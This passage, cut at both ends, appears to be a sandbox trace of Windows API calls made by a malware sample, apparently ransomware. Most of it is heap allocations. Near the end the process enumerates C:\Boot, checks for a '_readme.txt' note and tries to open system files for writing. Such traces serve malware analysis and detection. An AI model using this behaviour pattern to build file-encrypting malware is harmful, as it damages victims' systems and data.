hHeap=0x660000) returned 1 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.203] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.204] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.205] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.207] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.207] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.207] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.207] PathFindFileNameW (pszPath="") returned="" [0058.207] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.207] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.208] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.208] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0058.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.208] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5da58 [0058.208] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0058.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.208] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0058.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.208] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.208] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.209] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.209] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.209] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0058.209] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.209] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.209] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned=".txt" [0058.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.209] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.209] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.209] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.209] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.209] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.209] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.210] HeapFree (in: 